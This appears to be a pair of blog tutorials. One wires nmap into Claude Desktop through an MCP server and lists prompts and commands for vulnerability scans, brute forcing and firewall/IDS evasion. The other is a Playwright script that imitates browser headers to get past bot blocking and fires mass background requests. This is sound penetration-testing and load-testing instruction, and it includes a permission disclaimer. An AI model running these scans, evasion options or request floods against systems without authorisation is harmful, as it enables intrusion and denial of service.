MacOs: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

⚠️ Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation

On Linux (Ubuntu/Debian):

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
config = json.load(f)

if 'mcpServers' not in config:
config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
"command": "node",
"args": [
f"/Users/{username}/nmap-mcp-server/dist/index.js"
],
"env": {}
}

with open(config_file, 'w') as f:
json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Identifies XXE flaws in XML parsers.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script backdoor-check,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth-bypass,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
const b = path.basename(process.argv[1]);
console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
-d, --data DATA            Request body
-H, --header HEADER        Add custom header (repeatable)
-o, --output FILE          Write response body to file
-c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
-A, --user-agent UA        Custom User-Agent
-t, --timeout SECONDS      Request timeout [default: 30]
--async                Run request(s) in background
--count N              Number of async requests to fire [default: 1, requires --async]
--no-redirect          Do not follow redirects (best-effort)
--show-headers         Print response headers
--json                 Send data as JSON (sets Content-Type)
--form                 Send data as application/x-www-form-urlencoded
-v, --verbose              Verbose output
-h, --help                 Show this help message
EXAMPLES:
${b} https://example.com
${b} --async https://example.com
${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
for (let i = 0; i < argv.length; i++) {
const a = argv[i];
switch (a) {
case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
case '-d': case '--data': args.data = String(argv[++i] || ''); break;
case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
case '-o': case '--output': args.output = String(argv[++i] || ''); break;
case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
case '--async': args.async = true; break;
case '--count': args.count = Number(argv[++i] || '1'); break;
case '--no-redirect': args.followRedirects = false; break;
case '--show-headers': args.showHeaders = true; break;
case '--json': args.contentType = 'application/json'; break;
case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
case '-v': case '--verbose': args.verbose = true; break;
case '-h': case '--help': usage(); process.exit(0);
default:
if (!args.url && !a.startsWith('-')) args.url = a; else {
console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
process.exit(1);
}
}
}
return args;
}
function parseHeaderList(list) {
const out = {};
for (const h of list) {
const idx = h.indexOf(':');
if (idx === -1) continue;
const name = h.slice(0, idx).trim();
const value = h.slice(idx + 1).trim();
if (!name) continue;
out[name] = value;
}
return out;
}
function buildDefaultHeaders(userAgent) {
const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
return {
'User-Agent': ua,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Cache-Control': 'max-age=0'
};
}
async function performRequest(opts) {
// Cookie file handling
const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
const cookieFile = opts.cookieFile || defaultCookie;
// Launch Chromium
const browser = await chromium.launch({ headless: true });
const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
// Load cookies if present
if (fs.existsSync(cookieFile)) {
try {
const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
if (ss.cookies?.length) await context.addCookies(ss.cookies);
} catch {}
}
const request = context.request;
// Build request options
const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
if (opts.data) {
// Playwright will detect JSON strings vs form strings by headers
reqOpts.data = opts.data;
}
if (opts.followRedirects === false) {
// Best-effort: limit redirects to 0
reqOpts.maxRedirects = 0;
}
const method = opts.method.toUpperCase();
let resp;
try {
if (method === 'GET') resp = await request.get(opts.url, reqOpts);
else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
else {
console.error(`${RED}Unsupported method: ${method}${NC}`);
await browser.close();
process.exit(2);
}
} catch (e) {
console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
await browser.close();
process.exit(3);
}
// Persist cookies
try {
const state = await context.storageState();
fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
} catch {}
// Output
const status = resp.status();
const statusText = resp.statusText();
const headers = await resp.headers();
const body = await resp.text();
if (opts.verbose) {
console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
}
if (opts.showHeaders) {
// Print a simple status line and headers to stdout before body
console.log(`HTTP ${status} ${statusText}`);
for (const [k, v] of Object.entries(headers)) {
console.log(`${k}: ${v}`);
}
console.log('');
}
if (opts.output) {
fs.writeFileSync(opts.output, body);
} else {
process.stdout.write(body);
}
if (!resp.ok()) {
console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
await browser.close();
process.exit(4);
}
await browser.close();
}
async function main() {
const argv = process.argv.slice(2);
const opts = parseArgs(argv);
if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
if ((opts.count || 1) > 1 && !opts.async) {
console.error(`${RED}Error: --count requires --async${NC}`);
process.exit(1);
}
if (opts.count < 1 || !Number.isInteger(opts.count)) {
console.error(`${RED}Error: --count must be a positive integer${NC}`);
process.exit(1);
}
if (opts.async) {
// Fire-and-forget background processes
const baseArgs = process.argv.slice(2).filter(a => a !== '--async' && !a.startsWith('--count'));
const pids = [];
for (let i = 0; i < opts.count; i++) {
const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
pids.push(child.pid);
child.unref();
}
if (opts.verbose) {
console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
}
if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
process.exit(0);
}
await performRequest(opts);
}
main().catch(err => {
console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
-d "username=user&password=pass" \
https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
